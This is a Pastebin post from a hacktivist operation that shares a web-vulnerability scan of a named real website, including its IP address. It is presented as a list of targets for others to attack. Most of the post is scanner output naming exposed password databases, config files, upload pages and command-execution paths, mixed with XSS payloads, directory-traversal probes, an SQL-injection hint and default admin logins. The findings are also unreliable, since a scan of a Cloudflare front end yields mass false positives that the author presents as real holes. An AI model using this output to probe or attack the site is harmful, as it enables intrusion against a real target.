API tools faq
paste
Advertisement
Forever_way

Petsex.com FULL SCAN. #OpOutrageBeastiality

Forever_way
Sep 24th, 2012
6,461
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 96.28 KB | None | 0 0
raw download clone embed print report
  1. Greetings!
  2.  
  3. In the following list below, I did a scan on Petsex.com. I believe it has found MANY vulnerabilities, but that's for you to decide. The network is protected by cloudflare, so it seems it won't let me see a file I have been going to, but it really displays it. I also included the reverse IP check and Whois info.
  4.  
  5. Scan:
  6.  
  7.  
  8. ---------------------------------------------------------------------------
  9. + Target IP: 173.245.61.114
  10. + Target Hostname: cf-173-245-61-114.cloudflare.com
  11. + Target Port: 80
  12. + Start Time: 2012-09-25 17:30:11
  13. ---------------------------------------------------------------------------
  14. + Server: cloudflare-nginx
  15. + No CGI Directories found (use '-C all' to force check all possible dirs)
  16. + robots.txt retrieved but it does not contain any 'disallow' entries (which is odd).
  17.  
  18.  
  19. + /kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php
  20. + /lists/admin/: PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist
  21. + /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
  22. + /ssdefs/: Siteseed pre 1.4.2 has 'major' security problems.
  23. + /sshome/: Siteseed pre 1.4.2 has 'major' security problems.
  24. + /tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
  25. + /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
  26. + /scripts/samples/details.idc: See RFP 9901; www.wiretrip.net
  27. + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
  28. + OSVDB-637: /~root/: Allowed to browse root's home directory.
  29. + /cgi-bin/wrap: comes with IRIX 6.2; allows to view directories
  30. + /forums//admin/config.php: PHP Config file may contain database IDs and passwords.
  31. + /forums//adm/config.php: PHP Config file may contain database IDs and passwords.
  32. + /forums//administrator/config.php: PHP Config file may contain database IDs and passwords.
  33. + /forums/config.php: PHP Config file may contain database IDs and passwords.
  34. + /guestbook/guestbookdat: PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.
  35. + /guestbook/pwd: PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.
  36. + /help/: Help directory should not be accessible
  37. + OSVDB-2411: /hola/admin/cms/htmltags.php?datei=./sec/data.php: hola-cms-1.2.9-10 may reveal the administrator ID and password.
  38. + OSVDB-8103: /global.inc: PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php
  39. + OSVDB-59620: /inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
  40. + OSVDB-59619: /inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
  41. + OSVDB-59618: /inc/dbase.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
  42. + OSVDB-2703: /geeklog/users.php: Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.
  43. + OSVDB-8204: /gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
  44. + /guestbook/admin.php: Guestbook admin page available without authentication.
  45. + /getaccess: This may be an indication that the server is running getAccess for SSO
  46. + /cfdocs/expeval/openfile.cfm: Can use to expose the system/server path.
  47. + /tsweb/: Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html
  48. + /vgn/performance/TMT: Vignette CMS admin/maintenance script available.
  49. + /vgn/performance/TMT/Report: Vignette CMS admin/maintenance script available.
  50. + /vgn/performance/TMT/Report/XML: Vignette CMS admin/maintenance script available.
  51. + /vgn/performance/TMT/reset: Vignette CMS admin/maintenance script available.
  52. + /vgn/ppstats: Vignette CMS admin/maintenance script available.
  53. + /vgn/previewer: Vignette CMS admin/maintenance script available.
  54. + /vgn/record/previewer: Vignette CMS admin/maintenance script available.
  55. + /vgn/stylepreviewer: Vignette CMS admin/maintenance script available.
  56. + /vgn/vr/Deleting: Vignette CMS admin/maintenance script available.
  57. + /vgn/vr/Editing: Vignette CMS admin/maintenance script available.
  58. + /vgn/vr/Saving: Vignette CMS admin/maintenance script available.
  59. + /vgn/vr/Select: Vignette CMS admin/maintenance script available.
  60. + /scripts/iisadmin/bdir.htr: This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\<dirs> . http://www.microsoft.com/technet/security/bulletin/MS02-028.asp. http://www.cert.org/advisories/CA-2002-09.html.
  61. + /scripts/iisadmin/ism.dll: Allows you to mount a brute force attack on passwords
  62. + /scripts/tools/ctss.idc: This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.
  63. + /bigconf.cgi: BigIP Configuration CGI
  64. + /blah_badfile.shtml: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.
  65. + OSVDB-4910: /vgn/style: Vignette server may reveal system information through this file.
  66. + OSVDB-17653: /SiteServer/Admin/commerce/foundation/domain.asp: Displays known domains of which that server is involved.
  67. + OSVDB-17654: /SiteServer/Admin/commerce/foundation/driver.asp: Displays a list of installed ODBC drivers.
  68. + OSVDB-17655: /SiteServer/Admin/commerce/foundation/DSN.asp: Displays all DSNs configured for selected ODBC drivers.
  69. + OSVDB-17652: /SiteServer/admin/findvserver.asp: Gives a list of installed Site Server components.
  70. + /SiteServer/Admin/knowledge/dsmgr/default.asp: Used to view current search catalog configurations
  71. + /basilix/mbox-list.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page
  72. + /basilix/message-read.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page
  73. + /clusterframe.jsp: Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.
  74. + /IlohaMail/blank.html: IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
  75. + /bb-dnbd/faxsurvey: This may allow arbitrary command execution.
  76. + /cartcart.cgi: If this is Dansie Shopping Cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.
  77. + OSVDB-6591: /scripts/Carello/Carello.dll: Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.
  78. + /scripts/tools/dsnform.exe: Allows creation of ODBC Data Source
  79. + /scripts/tools/dsnform: Allows creation of ODBC Data Source
  80. + OSVDB-17656: /SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp: Used to create, modify, and potentially delete LDAP users and groups.
  81. + OSVDB-17657: /SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp: Used to create, modify, and potentially delete LDAP users and groups.
  82. + /prd.i/pgen/: Has MS Merchant Server 1.0
  83. + /readme.eml: Remote server may be infected with the Nimda virus.
  84. + /scripts/httpodbc.dll: Possible IIS backdoor found.
  85. + /scripts/proxy/w3proxy.dll: MSProxy v1.0 installed
  86. + /SiteServer/admin/: Site Server components admin. Default account may be 'LDAP_Anonymous', pass is 'LdapPassword_1'. see http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm
  87. + /siteseed/: Siteseed pre 1.4.2 has 'major' security problems.
  88. + /pccsmysqladm/incs/dbconnect.inc: This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.
  89. + /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.
  90. + /PDG_Cart/oder.log: Shopping cart software log
  91. + /ows/restricted%2eshow: OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.
  92. + /WEB-INF./web.xml: Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.l
  93. + /view_source.jsp: Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable.
  94. + /w-agora/: w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.
  95. + OSVDB-42680: /vider.php3: MySimpleNews may allow deleting of news items without authentication.
  96. + OSVDB-6181: /officescan/cgi/cgiChkMasterPwd.exe: Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.
  97. + /pbserver/pbserver.dll: This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/http://www.microsoft.com/technet/security/bulletin/ms00-094.asp.asp
  98. + /administrator/gallery/uploadimage.php: Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.
  99. + /pafiledb/includes/team/file.php: paFileDB 3.1 and below may allow file upload without authentication.
  100. + /phpEventCalendar/file_upload.php: phpEventCalendar 1.1 and prior are vulnerable to file upload bug.
  101. + /servlet/com.unify.servletexec.UploadServlet: This servlet allows attackers to upload files to the server.
  102. + /scripts/cpshost.dll: Posting acceptor possibly allows you to upload files
  103. + /upload.asp: An ASP page that allows attackers to upload files to server
  104. + /uploadn.asp: An ASP page that allows attackers to upload files to server
  105. + /uploadx.asp: An ASP page that allows attackers to upload files to server
  106. + /wa.exe: An ASP page that allows attackers to upload files to server
  107. + /basilix/compose-attach.php3: BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads
  108. + /server/: If port 8000, Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.
  109. + /vgn/ac/data: Vignette CMS admin/maintenance script available.
  110. + /vgn/ac/delete: Vignette CMS admin/maintenance script available.
  111. + /vgn/ac/edit: Vignette CMS admin/maintenance script available.
  112. + /vgn/ac/esave: Vignette CMS admin/maintenance script available.
  113. + /vgn/ac/fsave: Vignette CMS admin/maintenance script available.
  114. + /vgn/ac/index: Vignette CMS admin/maintenance script available.
  115. + /vgn/asp/MetaDataUpdate: Vignette CMS admin/maintenance script available.
  116. + /vgn/asp/previewer: Vignette CMS admin/maintenance script available.
  117. + /vgn/asp/status: Vignette CMS admin/maintenance script available.
  118. + /vgn/asp/style: Vignette CMS admin/maintenance script available.
  119. + /vgn/errors: Vignette CMS admin/maintenance script available.
  120. + /vgn/jsp/controller: Vignette CMS admin/maintenance script available.
  121. + /vgn/jsp/errorpage: Vignette CMS admin/maintenance script available.
  122. + /vgn/jsp/initialize: Vignette CMS admin/maintenance script available.
  123. + /vgn/jsp/jspstatus: Vignette CMS admin/maintenance script available.
  124. + /vgn/jsp/jspstatus56: Vignette CMS admin/maintenance script available.
  125. + /vgn/jsp/metadataupdate: Vignette CMS admin/maintenance script available.
  126. + /vgn/jsp/previewer: Vignette CMS admin/maintenance script available.
  127. + /vgn/jsp/style: Vignette CMS admin/maintenance script available.
  128. + /vgn/legacy/edit: Vignette CMS admin/maintenance script available.
  129. + /vgn/login: Vignette server may allow user enumeration based on the login attempts to this file.
  130. + OSVDB-35707: /forum/admin/wwforum.mdb: Web Wiz Forums password database found.
  131. + /fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  132. + OSVDB-52975: /guestbook/admin/o12guest.mdb: Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.
  133. + OSVDB-15971: /midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
  134. + OSVDB-15971: /MIDICART/midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
  135. + OSVDB-41850: /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb: MPCSoftWeb Guest Book passwords retrieved.
  136. + /news/news.mdb: Web Wiz Site News release v3.06 admin password database is available and unencrypted.
  137. + OSVDB-53413: /shopping300.mdb: VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.
  138. + OSVDB-53413: /shopping400.mdb: VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.
  139. + OSVDB-15971: /shoppingdirectory/midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
  140. + OSVDB-4398: /database/db2000.mdb: Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.
  141. + /admin/config.php: PHP Config file may contain database IDs and passwords.
  142. + /adm/config.php: PHP Config file may contain database IDs and passwords.
  143. + /administrator/config.php: PHP Config file may contain database IDs and passwords.
  144. + /contents.php?new_language=elvish&mode=select: Requesting a file with an invalid language selection from DC Portal may reveal the system path.
  145. + OSVDB-6467: /pw/storemgr.pw: Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.
  146. + /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.
  147. + /shopa_sessionlist.asp: VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.
  148. + OSVDB-53303: /simplebbs/users/users.php: Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.
  149. + /typo3conf/: This may contain sensitive Typo3 files.
  150. + /typo3conf/database.sql: Typo3 SQL file found.
  151. + /typo3conf/localconf.php: Typo3 config file found.
  152. + OSVDB-53386: /vchat/msg.txt: VChat allows user information to be retrieved.
  153. + OSVDB-4907: /vgn/license: Vignette server license file found.
  154. + /webcart-lite/config/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
  155. + /webcart-lite/orders/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
  156. + /webcart/carts/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
  157. + /webcart/config/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
  158. + /webcart/config/clients.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
  159. + /webcart/orders/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
  160. + /webcart/orders/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
  161. + /ws_ftp.ini: Can contain saved passwords for FTP sites
  162. + /WS_FTP.ini: Can contain saved passwords for FTP sites
  163. + /_mem_bin/auoconfig.asp: Displays the default AUO (LDAP) schema, including host and port.
  164. + OSVDB-17659: /SiteServer/Admin/knowledge/persmbr/vs.asp: Expose various LDAP service and backend configuration parameters
  165. + OSVDB-17661: /SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp: Expose various LDAP service and backend configuration parameters
  166. + OSVDB-17662: /SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp: Expose various LDAP service and backend configuration parameters
  167. + OSVDB-17660: /SiteServer/Admin/knowledge/persmbr/VsTmPr.asp: Expose various LDAP service and backend configuration parameters
  168. + /tvcs/getservers.exe?action=selects1: Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.
  169. + /whatever.htr: May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp)
  170. + /nsn/fdir.bas:ShowVolume: You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in
  171. + /nsn/fdir.bas: You can use fdir to ShowVolume and ShowDirectory.
  172. + /forum/admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
  173. + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
  174. + /jamdb/: JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.
  175. + OSVDB-1201: /cgi/cgiproc?: It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.
  176. + OSVDB-6196: /servlet/SchedulerTransfer: PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999
  177. + /servlet/sunexamples.BBoardServlet: This default servlet lets attackers execute arbitrary commands.
  178. + OSVDB-6196: /servlets/SchedulerTransfer: PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999
  179. + /perl/-e%20print%20Hello: The Perl interpreter on the Novell system may allow any command to be executed. See http://www.securityfocus.com/bid/5520. Installing Perl 5.6 might fix this issue.
  180. + /vgn/legacy/save: Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.
  181. + /IDSWebApp/IDSjsp/Login.jsp: Tivoli Directory Server Web Administration.
  182. + OSVDB-6466: /quikstore.cfg: Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt
  183. + /quikstore.cgi: A shopping cart.
  184. + /securecontrolpanel/: Web Server Control Panel
  185. + /siteminder: This may be an indication that the server is running Siteminder for SSO
  186. + /webmail/: Web based mail package installed.
  187. + /_cti_pvt/: FrontPage directory found.
  188. + /smg_Smxcfg30.exe?vcc=3560121183d3: This may be a Trend Micro Officescan 'backdoor'.
  189. + /nsn/..%5Cutil/attrib.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  190. + /nsn/..%5Cutil/chkvol.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  191. + /nsn/..%5Cutil/copy.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  192. + /nsn/..%5Cutil/del.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  193. + /nsn/..%5Cutil/dir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  194. + /nsn/..%5Cutil/dsbrowse.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  195. + /nsn/..%5Cutil/glist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  196. + /nsn/..%5Cutil/lancard.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  197. + /nsn/..%5Cutil/md.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  198. + /nsn/..%5Cutil/rd.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  199. + /nsn/..%5Cutil/ren.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  200. + /nsn/..%5Cutil/send.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  201. + /nsn/..%5Cutil/set.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  202. + /nsn/..%5Cutil/slist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  203. + /nsn/..%5Cutil/type.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  204. + /nsn/..%5Cutil/userlist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  205. + /nsn/..%5Cweb/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  206. + /nsn/..%5Cweb/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  207. + /nsn/..%5Cwebdemo/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  208. + /nsn/..%5Cwebdemo/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
  209. + /upd/: WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.
  210. + /CVS/Entries: CVS Entries file may contain directory listing information.
  211. + OSVDB-8450: /phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
  212. + OSVDB-8450: /db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
  213. + OSVDB-8450: /3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
  214. + OSVDB-8450: /phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
  215. + OSVDB-8450: /3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
  216. + OSVDB-8450: /phpmyadmindb_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
  217. + OSVDB-8450: /pmadb_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
  218. + /catalog.nsf: A list of server databases can be retrieved, as well as a list of ACLs.
  219. + /cersvr.nsf: Server certificate data can be accessed remotely.
  220. + /domlog.nsf: The domain server logs can be accessed remotely.
  221. + /events4.nsf: The events log can be accessed remotely.
  222. + /log.nsf: The server log is remotely accessible.
  223. + /names.nsf: User names and groups can be accessed remotely (possibly password hashes as well)
  224. + OSVDB-31150: /LOGIN.PWD: MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled.
  225. + OSVDB-31150: /USER/CONFIG.AP: MIPCD configuration information. MIPCD should not have the web interface enabled.
  226. + /admin-serv/config/admpw: This file contains the encrypted Netscape admin password. It should not be accessible via the web.
  227. + /cgi-bin/cgi_process: WASD reveals a lot of system information in this script. It should be removed.
  228. + /ht_root/wwwroot/-/local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
  229. + /local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
  230. + /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.
  231. + /852566C90012664F: This database can be read using the replica ID without authentication.
  232. + /hidden.nsf: This database can be read without authentication. Common database name.
  233. + /mail.box: The mail database can be read without authentication.
  234. + /setup.nsf: The server can be configured remotely, or current setup can be downloaded.
  235. + /statrep.nsf: Any reports generated by the admins can be retrieved.
  236. + /webadmin.nsf: The server admin database can be accessed remotely.
  237. + /examples/servlet/AUX: Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.
  238. + /Config1.htm: This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info.
  239. + /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
  240. + /WebAdmin.dll?View=Logon: Some versions of WebAdmin are vulnerable to a remote DoS (not tested). See http://www.ngssoftware.com.
  241. + /cgi-win/cgitest.exe: This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details. Remove this default CGI.
  242. + /cgi-shl/win-c-sample.exe: win-c-sample.exe has a buffer overflow
  243. + /.nsf/../winnt/win.ini: This win.ini file can be downloaded.
  244. + /................../config.sys: PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used.
  245. + ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
  246. + /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
  247. + /WebAdmin.dll?View=Logon: Some versions of WebAdmin are vulnerable to a remote DoS (not tested). See http://www.ngssoftware.com.
  248. + /cgi-win/cgitest.exe: This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details. Remove this default CGI.
  249. + /cgi-shl/win-c-sample.exe: win-c-sample.exe has a buffer overflow
  250. + /.nsf/../winnt/win.ini: This win.ini file can be downloaded.
  251. + /................../config.sys: PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used.
  252. + ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
  253. + /nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manage 1.0 allows directory listings of any location on the remote system.
  254. + OSVDB-2829: /phpwebfilemgr/index.php?f=../../../../../../../../../etc: phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.
  255. + /..\..\..\..\..\..\temp\temp.class: Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.
  256. + OSVDB-728: /admentor/adminadmin.asp: Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =
  257. + OSVDB-10107: /author.asp: May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.
  258. + OSVDB-2767: /openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>: OpenAutoClassifieds 1.0 is vulnerable to a XSS attack
  259. + /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  260. + OSVDB-4015: /jigsaw/: Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.
  261. + OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
  262. + /anthill/login.php: Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and http://www.cert.org/advisories/CA-2000-02.html
  263. + /cfdocs/expeval/sendmail.cfm: Can be used to send email; go to the page and fill in the form
  264. + OSVDB-22: /cgi-bin/bigconf.cgi: BigIP Configuration CGI
  265. + /ammerum/: Ammerum pre 0.6-1 had several security issues.
  266. + /ariadne/: Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.
  267. + /cbms/cbmsfoot.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  268. + /cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  269. + /cbms/editclient.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  270. + /cbms/passgen.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  271. + /cbms/realinv.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  272. + /cbms/usersetup.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
  273. + /ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C: This check (A) sets up the next bad blue test (B) for possible exploit. See http://www.badblue.com/down.htm
  274. + OSVDB-59412: /db/users.dat: upb PB allows the user database to be retrieved remotely.
  275. + /Admin_files/order.log: Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt.
  276. + /admin/cplogfile.log: DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.
  277. + /admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
  278. + /cfdocs/snippets/fileexists.cfm: Can be used to verify the existance of files (on the same drive info as the web tree/file)
  279. + /cgi-bin/MachineInfo: Gives out information on the machine (IRIX), including hostname
  280. + OSVDB-59646: /chat/!nicks.txt: WF-Chat 1.0 Beta allows retrieval of user information.
  281. + OSVDB-59645: /chat/!pwds.txt: WF-Chat 1.0 Beta allows retrieval of user information.
  282. + OSVDB-53304: /chat/data/usr: SimpleChat! 1.3 allows retrieval of user information.
  283. + /config.php: PHP Config file may contain database IDs and passwords.
  284. + /config/: Configuration information may be available remotely.
  285. + /cplogfile.log: XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.
  286. + /examples/jsp/snp/anything.snp: Tomcat servlet gives lots of host information.
  287. + /cfdocs/snippets/evaluate.cfm: Can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info
  288. + /cfide/Administrator/startstop.html: Can start/stop the server
  289. + OSVDB-10598: /cd-cgi/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
  290. + /cgi-bin/handler: Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands
